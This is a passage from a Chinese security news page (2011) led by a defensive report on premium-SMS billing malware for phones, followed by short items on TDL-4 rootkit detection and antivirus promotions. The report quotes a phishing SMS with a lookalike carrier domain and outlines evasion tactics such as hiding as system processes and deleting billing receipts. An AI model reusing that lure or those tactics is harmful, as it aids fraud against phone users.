&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;按正常有功能的軟件來進行傳播。</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;iv.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;偽裝以該品牌該型號的補丁升級進行傳播。</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;v.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;集成在刷機ROM。</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;vi.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;集成在一鍵安裝包里。</p><p><strong>第四章&nbsp; 愈來愈隱蔽的病毒吸費</strong></p><p>隨著扣費、屏蔽、云端控制技術的不斷成熟,病毒吸費呈現出愈來愈隱蔽甚至無聲無息的趨勢。</p><p><strong>4.1 技術成熟讓病毒吸費愈來愈隱蔽</strong></p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;i.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;以前的病毒技術,一般是內置扣費的指令代碼到病毒軟件中,用戶安裝軟件后,短時間內便會發作進行扣費;</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ii.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;現在的技術,則已經發展到很成熟,很隱蔽:發送的扣費短信的指令、端口號、發送時間、發送頻率均能做到云端(服務器)控制,做到短信指令、端口號,可以根據用戶所在的地區、SIM卡所屬的運營商進行可扣費的配置,并且可以隨時更改;</p><p><img alt="" src="https://pic.cr173.com/up/2011-8/201181710231601.jpg" /></p><p>(圖2)吸費海盜王病毒反編譯分析</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;iii.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[f1]&nbsp;現在的技術都能輕易做到,在本機刪除相關的扣費回執記錄,包括特定運營商扣費短信、撥號記錄、WAP上網記錄。</p><p>4.2 <strong>“悄悄潛伏”讓吸費病毒愈來愈隱蔽:</strong></p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;i.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;不會立即發作,可以選擇時間發作,如:等午夜時候才偷偷扣費;</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ii.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;不會立即發作,從服務器取指令,按指令配置發作時間與方式;</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;iii.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;安裝后,偽裝為正常進程的名字,如系統進程,或其他軟件進程進行潛伏;</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;iv.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;用戶量潛伏,一些病毒制造者很有耐性,等被嵌入病毒的軟件用戶到達一定量后,才偷偷扣費。</p><p><strong>第五章 典型吸費病毒案例</strong></p><p><strong>5.1&nbsp;&nbsp;偽升級扣費木馬</strong></p><p>病毒傳播者利用向用戶發送“中國移動提醒您,檢測到您的手機存在安全漏洞,請點擊下載并安裝安全補丁http://1OO86.net/****.apk/sisx”(這里是<strong>字母“O”冒充數字“0”</strong>)的WAP PUSH短信,分別針對塞班與安卓發送識配的安裝包,該病毒應該是拿到部分的用戶號碼與機型,用戶點擊下載安裝后,病毒安裝沒有圖標產生,并自動向“1062****”等端口號發送業務訂購短信,同時還會屏蔽10086發給用戶的所有信息,用戶在毫不知情的情況下,被惡意扣取資費。</p><p><img alt="" src="https://pic.cr173.com/up/2011-8/201181710231658.jpg" /></p><p>(圖3)QQ手機管家查殺偽升級扣費木馬</p><p><strong>&nbsp;</strong></p><p><strong>5.2&nbsp;&nbsp; 偽卡巴扣費木馬、偽殺毒搶錢王等</strong></p><p>這幾個病毒主要是偽裝為殺毒軟件,用戶安裝后,立即假裝掃描手機內的文件,然后<strong>謊稱查到幾個殺毒軟件,需要用戶付費**元查殺病毒</strong>。</p><p><img alt="" src="https://pic.cr173.com/up/2011-8/201181710231779.jpg" /></p><p>(圖4)QQ手機管家掃描偽殺毒病毒報告</p><p><strong>5.3吸費海盜王</strong></p><p>此病毒嵌入到一款國外著名的游戲軟件里,散布在幾個大的論壇與電子市場上,</p><p>另外,病毒發作時也是隱蔽的短信扣費,扣費指令與發送時機由云端配置,但這</p><p>個病毒在扣費成功后,還會向固定的幾個手機號碼發送扣費手機的IMEI號等信</p><p>息,部分存在分成對帳的可能。</p><p><img alt="" src="https://pic.cr173.com/up/2011-8/201181710231400.jpg" /></p><p>(圖5)QQ手機管家截獲“吸費海盜王”病毒</p><p><img alt="" src="https://pic.cr173.com/up/2011-8/201181710231601.jpg" /></p><p><img alt="" src="https://pic.cr173.com/up/2011-8/201181710231466.jpg" /></p><p>(圖6)“吸費海盜王”病毒云端控制功能以及竊取用戶隱私</p><p><strong>5.4&nbsp;&nbsp;美女勾魂吸費大盜</strong></p><p>病毒嵌入到三款叫“美女**”的工具軟件中,安裝后,<strong>偽裝為系統進程</strong>,讓用戶不容易發現,并進行暗中短信扣費。</p><p><img alt="" src="https://pic.cr173.com/up/2011-8/201181710231449.jpg" /></p><p>(圖7)QQ手機管家查殺美女勾魂吸費大盜病毒</p><p><img alt="" src="https://pic.cr173.com/up/2011-8/201181710231626.jpg" /></p><p>(圖8)美女勾魂病毒偽裝成系統程序“設置”</p><p><strong>5.5&nbsp;&nbsp;饑渴吸費魔</strong></p><p>此病毒嵌入了許多款的正常軟件中,這些軟件曾經遍布多個大論壇與電子市</p><p>場,發作時,除了由云端配置隱蔽的短信扣費外,還會偷偷盜打<strong>IVR電話</strong>,</p><p>此病毒的發現,表明吸費已經從短信,橫向跨度到IVR了。</p><p><img alt="" src="https://pic.cr173.com/up/2011-8/201181710231390.jpg" /></p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(圖9)饑渴吸費魔嵌入了許多款正常軟件</p><p><strong>第六章&nbsp;手機吸費病毒發展趨勢預測</strong></p><p><strong>6.1&nbsp;&nbsp;灰色產業鏈呈現逐漸成熟的趨勢。</strong></p><p>目前,吸費病毒的產業鏈已經呈現出不斷成熟的趨勢,從病毒開發、病毒營銷傳播、</p><p>病毒吸費拓展(找SP合作)、病毒收益對帳分成等環節,都有相應專業的角色或功</p><p>能相對應。簡單來說,就是病毒從用戶手機私自扣費后,相關產業鏈的角色都能從</p><p>中分取利益,特別是病毒開發、營銷,還有SP。</p><p>6.2&nbsp;&nbsp;<strong>吸費病毒變種越來越多。</strong>由于吸費病毒技術已經不斷完善,可以通過云端服務器隨意控制扣費端口、扣費時間、扣費頻率,可根據用戶所在地SIM卡運營商對扣費方式進行配置,因此吸費病毒可以不斷變種。再加上當前智能手機應用種類豐富,病毒有了可以不斷復制的條件,只要將原病毒代碼稍作修改一些參數、變量,嵌入不同的手機應用中,都可以成為一款新吸費病毒。</p><p><strong>6.3&nbsp;&nbsp;規??赡艹^PC產業。</strong>此外,手機吸費病毒產業鏈已經開始逐步完善,從制毒到傳播,再到找SP扣費等一系列環節都有專人負責,每個環節都能夠精準的獲得吸費分成,因此手機吸費病毒產業會呈現不斷發展壯大趨勢,手機用戶數量遠遠大于PC用戶數,智能終端大面積普及,手機吸費病毒規??赡軙h高于PC病毒產業。</p><p><strong>6.4&nbsp;&nbsp;用戶維權取證難。</strong>與此同時,手機吸費病毒相比PC病毒更容易直接獲益,而且對于每個被吸費用戶來說只是幾元到幾十元不等,由于數額較小,單個受害者很難維權。加上其高超的偽裝術,自動定制服務,自動刪除扣費回執信息,導致用戶很難發現被吸費,即使發現被吸費之后,也難以對吸費病毒的作案行為進行有效取證,無法通過技術手段證明是病毒私自定制了服務,而不是用戶定制了服務,因此最終都不了了之。</p><p><strong>第七章&nbsp;關于移動安全的用戶常見誤區&nbsp; </strong></p><p><strong>誤區一:手機病毒、木馬很可怕</strong></p><p>1)&nbsp;&nbsp;正確看待手機病毒和木馬可能帶來的危害</p><p>病毒與木馬,可以實現多種危害,危害從高至低排序有:惡意扣費、遠程控制、</p><p>隱私竊取、惡意傳播、資費消耗、系統破壞、詐騙欺詐、流氓行為等,取其中</p><p>幾項舉例說明如下:</p><p>a)&nbsp;&nbsp;危害比較高的:(1)惡意扣費:通過隱蔽執行、欺騙用戶點擊等手段,訂購各類收費業務或使用手機支付,導致用戶經濟損失的;(2)遠程控制:能夠接受遠程控制端指令并進行相關操作。(3)獲取涉及用戶隱私信息,如用戶的通訊內容、郵件內容,各種手機上的帳號密碼,各種文件、照片、通訊錄等。</p><p>b)&nbsp;&nbsp;危害比較低的:流氓行為,如自動添加、修改、刪除收藏夾、快捷方式,彈出廣告窗口,不能退出軟件,無法正常卸載、刪除等。</p><p>2)&nbsp;&nbsp;移動病毒和木馬的產業鏈發展狀況目前尚未成熟</p><p>移動病毒和木馬已經發展到產業鏈驅動,如惡意扣費木馬,就分為病毒制造者、</p><p>病毒傳播運營、病毒扣費商務拓展、病毒扣費SP等的角色?,F在,惡意扣費木</p><p>馬的技術一般包括軟件篡改、偽裝傳播、云端控制、根據用戶不同的區域進行</p><p>不同形式的扣費等技術,這些技術已經比較成熟,使用同樣的技術,只要修改</p><p>不同的類名,進行不同的打包,就可以復制為新的病毒。</p><p>整個移動病毒和木馬的產業鏈發展狀況相對PC尚不成熟。</p><p><strong>&nbsp;</strong></p><p><strong>誤區二:沒有多少移動病毒和木馬,因為我和我的朋友都沒有遇到過</strong></p><p>現發現的手機病毒與木馬已超千種,被感染的軟件已超萬個?,F在的病毒與木馬技術日漸成熟,且趨向于隱蔽化與智能化,可以使手機用戶在感覺不到中毒的情況下就已經產生了危害。</p><p>拿惡意扣費木馬來舉例:</p><p>1)&nbsp;&nbsp;例一:隱蔽偽裝與傳播方式:病毒和木馬采用多種方式進行偽裝,如:把惡意</p><p>代碼嵌入到眾多的熱門軟件中,或者開發一個正常功能類的軟件,然后把這些</p><p>軟件散布到各熱門論壇與電子市場中,再運作一些破解、優化、美化、漢化、</p><p>必裝、最強等字眼來誘惑用戶下載安裝,用戶安裝了這個軟件后,病毒和木馬</p><p>就已經被安裝到移動設備上了。</p><p>2)&nbsp;&nbsp;例二:采用提示升級的方式進行安裝:先提供完全沒有問題的正常的軟件給用戶安裝,軟件在使用一段時間后,提示軟件升級,在用戶確認同意升級時,才下升安裝了病毒包。</p><p>3)&nbsp;&nbsp;例三:潛伏伺機發作:一般是安裝的時候不立即發作,伺機聯網從云端獲取指令,再按指令控制發起扣費操作時間,扣費發送目標端口等。</p><p>4)&nbsp;&nbsp;例四:攔截刪掉所有發送的扣費與確認扣費的短信或IVR電話等通訊記錄,用戶在不知不覺的情況下就已經被扣費。</p><p><strong>&nbsp;</strong></p><p><strong>誤區三:安裝知名軟件或是正規電子市場、網站或論壇下載一定無風險</strong> </p><p>通常知名的軟件也是被病毒和木馬篡改或嵌入的重點目標之一,而一般的用戶是難以在安裝的過程中進行判斷的,在安裝后也難以判斷,因為這些軟件的正常功能還是可以使用的。所以,不是軟件名稱為知名的軟件就安全。而是要從知名軟件的官方網站下載安裝,以確保手機安全軟件未被嵌入病毒。</p><p>部分的病毒和木馬也是通過正規的電子市場、網站、論壇進行傳播的,而病毒和木馬的后發作型或后安裝型,都會使一般的用戶難以判斷現在下載與安裝的是否為安全軟件。</p><p><strong>第八章&nbsp; 專家支招:如何規避手機吸費病毒風險</strong></p><p>1)&nbsp; 不要輕易打開陌生人短信中的網址鏈接,以防下載木馬。遇到升級要求或者下載提示,不要隨便點“同意”,要保持充分的警惕性。</p><p>2) 盡量到軟件的官網、或官網授權進行下載,或是安全可靠的站點下載軟件。一定不要輕易從手機論壇、不知名的應用市場中下載手機軟件,而是要到經過安全認證,有品牌知名度的手機應用下載站下載手機軟件,比如,手機騰訊網應用中心、QQ手機管家的“人氣推薦”“裝機必備”。也可以使用QQ電腦管家的手機管理功能,可以直接在電腦上安裝QQ手機管家,同時還提供萬款手機軟件免費下載。</p><p>3) 安裝專業大品牌手機安全軟件,并經常更新最新病毒庫,實時監控各種可能原來沒有毒,但后來升級或安裝新的病毒的軟件。比如,QQ手機管家、金山手機衛士等。<br /><br />QQ手機管家 Android版:<a href="http://www.pirinnaturalssoapandspa.com/soft/17294.html">http://www.pirinnaturalssoapandspa.com/soft/17294.html</a></p> [病毒漏洞]使用PowerTool輕松檢測魔影病毒(TDSS.TDL-4) http://www.pirinnaturalssoapandspa.com//html/12812_1.html 西西 病毒漏洞 2011/8/14 9:41:39 <p>&nbsp;就不過多重復了,為了保護自己的篡改的MBR,可謂是用盡可手段,<br /><br /><strong>PowerTool可以在不恢復和修改TDL-4任何鉤子的情況下,<br />直接穿透它的防護,檢測到TDL-4 rootkit</strong><br /><br /><br />PowerTool 下載:<a href="http://www.pirinnaturalssoapandspa.com/soft/5029.html">http://www.pirinnaturalssoapandspa.com/soft/5029.html</a><br /><br />首先,有兩個地方,大家可能以前就知道了,<br />一個是工作列線程<br /><img alt="" src="https://pic.cr173.com/up/2011-8/201181494143321.jpg" /><br /><br /><br />一個是StartIO的鉤子<br /><img alt="" src="https://pic.cr173.com/up/2011-8/201181494143146.jpg" /><br /><br /><br />這個以前版本的PowerTool就可以檢測到<br />這次加強了內核模塊的檢測,可以看到TDL-4的隱藏驅動<br /><img alt="" src="https://pic.cr173.com/up/2011-8/201181494143509.jpg" /><br /><br /><br />TDL-4還劫持了ATAPI的設備<br /><img alt="" src="https://pic.cr173.com/up/2011-8/201181494143413.jpg" /><br /><br /><br />如果以上,大家還不能確認是否是真的中了TDL-4病毒的話<br />最后一個,可以徹底讓它露出真面目,<br /><br />在MBR里面點擊強力檢測按鈕(目前不支持AHCI/RAID/SCSI模式)<br />可以完全穿透TDL-4的防護,檢測到MBR<br /><img alt="" src="https://pic.cr173.com/up/2011-8/201181494143358.jpg" /><br /><br /><br /><br />清除的話,建議大家可以用卡巴或者BitDefender的專殺工具<br />也可以到PE系統里面,修復MBR來清除<br /><br />以后PT會進一步加強清楚的工作,呵呵 </p> [病毒漏洞]美國10歲女黑客發現iOS和Android上農場游戲漏洞 http://www.pirinnaturalssoapandspa.com//html/12733_1.html 西西 病毒漏洞 2011/8/7 23:19:19 <p>拉斯維加斯Defcon的最新消息,一名化名為CyFi的10歲女黑客,獨立安全研究人員宣告了一個iOS和Android設備上的游戲漏洞,她最早在2011年1月份發現了這些漏洞,因為她“對農場的游戲感到厭煩”,因此決定披露它。</p><p>這個漏洞可以讓玩家更改作物成熟的時間,從而對游戲廠商的正常規則提出挑戰。盡管多數游戲開發商會阻止這種“催熟”作物的行為,但CyFi還是表示已經發現了破解的方法。<br /><br />這名年輕的黑客將因為披露該漏洞而獲得來自AllClearID身份保護公司的100美元獎勵。在1000人面前讓一名10歲的女孩子當眾發表演講顯然有難度,因此黑客大會很貼心地用10分鐘長的片子來完成了這一切。<br /><br /><img src="https://pic.cr173.com/up/2011-8/201187231929233.jpg" alt="" /></p> [安全產品]全方位解析360殺毒3.0嘗鮮版高清視頻 http://www.pirinnaturalssoapandspa.com//html/12728_1.html 西西 安全產品 2011/8/6 21:53:55 <p>從2.0時代到3.0時代,360殺毒走過了不一樣的旅程;在3.0時代360殺毒的主動防御體系發生了本質的變化!那么到底發生了什么變化呢?接下來讓我們來看看聽風閣同學做的精彩視頻吧!<br /><br /><embed pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" src="http://player.youku.com/player.php/sid/XMjkxNjgwMDQ0/v.swf " width="460" height="390" type="application/x-shockwave-flash" wmode="Transparent" allowscriptaccess="never" allownetworking="internal" invokeurls="false"></embed><br /><br /><a href="http://www.pirinnaturalssoapandspa.com/soft/30968.html" target="_blank">點擊下載360殺毒3.0嘗鮮版 </a></p><p><br />突破性Pro3D全面防御體系12層防護 <br />防御病毒最全面電腦真實系統防御與虛擬化沙箱的完美結合:<br />入侵防御讓病毒無法進入電腦,系統防御實時攔截程序有害行為,隔離防御可放心使用帶毒播放器、電子書、算號器等風險程序。<br /><br />1秒云鑒定最新病毒極速云鑒定,比普通云鑒定技術最多快99倍時間消失了!近4億用戶組成最強云安全網絡,無時差分析識別最新病毒,無需上傳文件,1秒極速云鑒定,比傳統云鑒定技術快99倍!<br /><br />刀片式智能5引擎架構 凌厲查殺360云查殺引擎、QVM人工智能引擎、主動防御引擎,還可搭配全球知名的Avira或BitDefender殺毒引擎?!爸形麽t”豪華組合,凌厲查殺無死角。<br /><br />低至10M的安裝包 極致輕巧讓您比快更快!如此全面防御,竟然包含在僅 10M 的程序包中。對系統性能的影響更是做到了不可思議的極致輕微,即便老爺機也可輕松運行。<br /><br />國際品質的殺毒軟件 國際權威測試成績優異360殺毒是2011年唯一獲得AV-C、VB100及英國西海岸實驗室Checkmark三項權威認證的國產殺毒軟件,“殺毒軟件世界杯”AV-C中的國產軟件代表。</p> [安全產品]360安全衛士5大王牌功能:木馬查殺、清理插件、修復漏洞。。 http://www.pirinnaturalssoapandspa.com//html/12729_1.html 西西 安全產品 2011/8/6 21:49:44 <p>一、【360安全衛士體檢】</p><p><strong>1.什么是體檢?</strong> <br />體檢功能可以全面的檢查您電腦的各項狀況。體檢完成后會提交給您一份優化您電腦的意見,您可以根據您的需要對電腦進行優化。也可以便捷的選擇一鍵優化。 <br /><strong>2.為什么要體檢?</strong> <br />體檢可以讓您快速全面的了解您的電腦,并且可以提醒您對電腦做一些必要的維護。如:木馬查殺,垃圾清理,漏洞修復等。定期體檢可以有效的保持您電腦的健康。 <br /><strong>3.如何進行體檢?</strong> <br />您點開360安全衛士的界面,體檢會自動開始進行。 </p><p><img alt="" src="https://pic.cr173.com/up/2011-8/201186214827300.jpg" /></p><p>二、【木馬查殺】</p><p><strong>1.什么是木馬查殺?</strong> <br />利用計算機程序漏洞侵入后竊取文件的程序程序被稱為木馬。木馬查殺功能可以找出您電腦中疑似木馬的程序并在取得您允許的情況下刪除這些程序。 <br /><strong>2.為什么要查殺木馬?</strong> <br />木馬對您的電腦危害非常大,可能導致您包括支付寶,網絡銀行在內的重要賬戶密碼丟失。木馬的存在還可能導致您的隱私文件被拷貝或刪除。所以及時查殺木馬對安全上網來說十分重要。 <br /><strong>3.如何進行木馬查殺?</strong> <br />點擊進入木馬查殺的界面后,您可以選擇“快速掃描”“全盤掃描”和“自定義掃描”來檢查您的電腦里是否存在木馬程序。掃描結束后若出現疑似木馬,您可以選擇刪除或加入信任區</p><p><img alt="" src="https://pic.cr173.com/up/2011-8/201186214829599.jpg" /></p><p>三、【清理插件】</p><p><strong>1.什么是清理插件?</strong> <br />插件是一種遵循一定規范的應用程序接口編寫出來的程序。很多軟件都有插件,例如在IE中,安裝相關的插件后,WEB瀏覽器能夠直接調用插件程序,用于處理特定類型的文件。過多的插件會拖慢你的電腦的速度。清理插件功能會檢查你電腦中安裝了哪些插件,您可以根據網友對插件的評分以及你自己的需要來選擇清理哪些插件,保留哪些插件。 <br /><strong>2.為什么要清理插件?</strong> <br />過多的插件會拖慢您電腦的速度。而很多插件可能是在您不知情的情況下安裝的,您有可能并不了解這些插件的用途,也并不需要這些插件。通過定期的清理插件,您可以及時的刪除這些插件,保證您電腦運行的正常速度。 <br /><strong>3.如何清理插件?</strong> <br />點擊進入常用—清理插件見面后,點擊開始掃描,360安全衛士就會開始檢查您電</p><p><img alt="" src="https://pic.cr173.com/up/2011-8/201186214838143.jpg" /></p><p>四、【修復漏洞】</p><p><strong>1.什么是系統漏洞?</strong> <br />這里的系統漏洞這里是特指您的Windows操作系統在邏輯設計上的缺陷或在編寫時產生的錯誤。 <br /><strong>2.為什么要修補修通漏洞?</strong> <br />系統漏洞可以被不法者或者電腦黑客利用,通過植入木馬、病毒等方式來攻擊或控制整個電腦,從而竊取您電腦中的重要資料和信息,甚至破壞您的系統。 <br /><strong>3.如何修復?</strong> <br />可單擊右下方的“重新掃描”以查看是否有需要修補的漏洞。 </p><p><img alt="" src="https://pic.cr173.com/up/2011-8/201186214842798.jpg" /></p><p>五、【電腦清理】</p><p><strong>1.什么是垃圾文件?</strong> 垃圾文件,指系統工作時所過濾加載出的剩余數據文件,雖然每個垃圾文件所占系統資源并不多,但是有一定時間沒有清理時,垃圾文件會越來愈多。 <br /><strong>2.為什么要清理垃圾文件?</strong> <br />垃圾文件長時間堆積會拖慢你電腦的運行速度和上網速度,浪費硬盤空間。 <br /><strong>3.如何清理垃圾?</strong> <br />您可以勾選需要清理的垃圾文件種類并點擊“開始掃描”。如果不清楚哪些文件該清理,哪些文件不該清理,可點擊“推薦選擇”,讓360安全衛士來為您做合理的選擇。 </p><p><img alt="" src="https://pic.cr173.com/up/2011-8/201186214847603.jpg" /></p><p>6、【系統修復】</p><p><strong>1、系統修復能做什么?</strong> <br />系統修復可以檢查你電腦中多個關鍵位置是否處于正常的狀態。 <br /><strong>2、遇到什么問題時可以用系統修復?</strong> <br />當你遇到瀏覽器主頁、開始菜單、桌面圖標、文件夾、系統設置等出現異常時,使用系統修復功能,可以幫你找出問題出現的原因并修復問題。 </p><p><img alt="" src="https://pic.cr173.com/up/2011-8/201186214850718.jpg" /></p> [網絡安全]七夕網絡傳情木馬“偽裝”入侵 QQ電腦管家呼吁提高警惕 http://www.pirinnaturalssoapandspa.com//html/12726_1.html 西西 網絡安全 2011/8/6 16:05:14 <p>七夕將至,浪漫來襲。許多情侶都會通過發送祝福郵件、傳情FLASH、或者個性化頁面等方式向心上人表達愛意和祝福,病毒制造者及不法分子往往利用這一時機,將木馬植入傳情類七夕祝福類網頁,誘使網民上當,獲取隱私數據甚至坑騙錢財。 </p><p>據QQ電腦管家產品工程師介紹,七夕傳情類掛馬網頁主要有電子賀卡類、電子情書類、情人緣分測試類等形式,均是在網頁中嵌入惡意代碼,并通過電子郵件或者互發鏈接廣為散播。如果不加辨別隨意打開此類網頁,病毒就會悄悄入侵。輕則電腦被植入惡意信息,重則可導致操作系統受損,甚至丟失網銀賬號、網游賬號等重要數據。如:去年流傳甚廣的“性感相冊”病毒,就裝扮成精美的電子賀卡,迷惑網友點擊下載,不少人深受其害。</p><p>根據中國互聯網信息中心CNNIC發布的第28次互聯網調查熱點數據報告顯示,2011年上半年,44.7%的網民在使用互聯網過程中遇到過病毒或木馬攻擊,受攻擊人數達到2.17億?!肮澕偃找呀洺蔀楫斚码娔X病毒傳播的重要時機?!盦Q電腦管家產品負責人表示,“所以,每逢佳節網絡安全意識更不能松懈,一定別忘在上網時開啟病毒安全防御軟件?!?lt;/p><p>該負責人介紹,針對上述七夕情人節可能出現的網絡安全問題,QQ電腦管家的多重安全保障系統完全能有效防護用戶電腦,讓情侶們放心傳情。<br />● 網頁防火墻功能可實時監控所在網頁的活動,對于假冒網站或含有木馬及惡意URL的傳情網頁、緣分測試網頁等都可進行有效攔截,阻擋其對于系統的攻擊;<br />● 下載保護功能可針對多下載通道(瀏覽器下載、下載工具、聊天工具文件傳輸等)進行實時防護,在用戶下載或傳輸含有病毒的電子賀卡或電子情書等文件時,可及時提醒用戶該文件的安全性,并給出合理的處置措施。<br /><br /><img alt="" src="https://pic.cr173.com/up/2011-8/2011861669469.jpg" /></p><p>圖注:QQ電腦管家實時防護功能截圖</p><p>針對七夕前網民所面臨的網絡安全風險,QQ電腦管家產品負責人提醒廣大用戶,七夕情人節時在為情人送祝福表愛意的同時,一定要提升防范意識,務必要開啟安全防御軟件的實時防護功能,切勿隨意點開不明郵件中的鏈接,謹慎接收不明文件,過一個開心、甜蜜、浪漫的情人節。</p> [安全產品]QQ電腦管家成全球第一款通過英國西海岸實驗室殺軟評測的安全管理軟件 http://www.pirinnaturalssoapandspa.com//html/12725_1.html 西西 安全產品 2011/8/6 15:08:53 <p>近日,QQ電腦管家通過英國西海岸實驗室(West Coast Labs)的權威認證,獲得該實驗室舉行的國際上信息安全類產品的最高認證之一Checkmark的肯定,QQ電腦管家也因此成為全球第一款通過殺軟評測的安全管理軟件。<br /><br /></p><p><img alt="" src="https://pic.cr173.com/up/2011-8/201186151138941.jpg" /></p><p><br /><br />據悉,<a href="http://www.pirinnaturalssoapandspa.com/soft/11253.html" target="_blank">QQ電腦管家</a>是騰訊公司于2010年5月底推出的一款安全管理軟件,截至目前已具有云查殺木馬、系統漏洞修補、實時防護、清理插件等多項安全防護功能,成為名副其實的為電腦安全服務的“管家”。而此次由英國西海岸實驗室(West Coast Labs)舉行的Check Mark認證,與VB100認證、AV-C認證并稱為全球三大權威認證,在世界范圍內享有極高的盛譽,能夠獲得Check Mark的安全認證,證明<a href="http://www.pirinnaturalssoapandspa.com/soft/11253.html" target="_blank">QQ電腦管家</a>無論在基礎安全防護還是電腦輔助管理方面,都具備極高的性能優勢,堪稱是目前最優質的安全管理工具之一。<br /><br />據了解,為了極大提升安全內核競爭力,<a href="http://www.pirinnaturalssoapandspa.com/soft/11253.html" target="_blank">QQ電腦管家</a>目前已經擁有強勁的四核木馬查殺引擎,匯集了國際一流的專業殺毒引擎技術。其中,包括來自德國的小紅傘(Avira)引擎,以及趨勢(TrendMicro)引擎和國內行業領先的金山云查殺引擎,配合QQ電腦管家獨有的騰訊云引擎,依賴騰訊與數億用戶共同打造的海量數據運營平臺,24小時不間斷補充最新木馬樣本,足以橫掃最新、最頑固的各類流行木馬。<br /><br />而在電腦輔助管理方面, <a href="http://www.pirinnaturalssoapandspa.com/soft/11253.html" target="_blank">QQ電腦管家</a>也在業內擁有多項創新亮點。首創的無線安全助手,有效防止無線蹭網的情況發生;軟件搬家功能,幫助用戶科學管理電腦;12層防御體系,24小時防御病毒木馬黑客入侵,全面精準;5重系統優化,徹底提升電腦速度;還有轉為3G用戶提供的流量提醒工具,3G流量統計……為億萬網民提供了全面的安全防護和有效的電腦管理,更在2010年被艾瑞咨詢評為“年度十大新銳軟件”之一,獲得行業的認可。 </p> [安全產品]QQ電腦管家+ 金山毒霸”強強聯手套裝極速查殺病毒 http://www.pirinnaturalssoapandspa.com//html/12695_1.html 西西 安全產品 2011/8/4 22:07:13 <p><strong>“QQ電腦管家 + 金山毒霸獵豹版”免費極速殺毒套裝<br /><br />發布日期:2011年08月03日 套裝大?。?49KB</strong></p><p><strong><br />下載地址:<a href="http://www.pirinnaturalssoapandspa.com/soft/30085.html">http://www.pirinnaturalssoapandspa.com/soft/30085.html</a></strong></p><p><strong>What's new:</strong><br />1. 集合國內外一流殺毒引擎技術,強勁多核查殺引擎,專業品質,查殺更徹底;<br />2. 全球首屈一指的云安全引擎以及專業病毒分析師隨時待命,比傳統殺毒軟件快60倍的鑒定速度;<br />3. 基于云的殺毒套裝,相對同類安全套裝產品,系統資源占用最小。<br /><br /><img alt="" src="https://pic.cr173.com/up/2011-8/20118422852404.jpg" /><br /><br 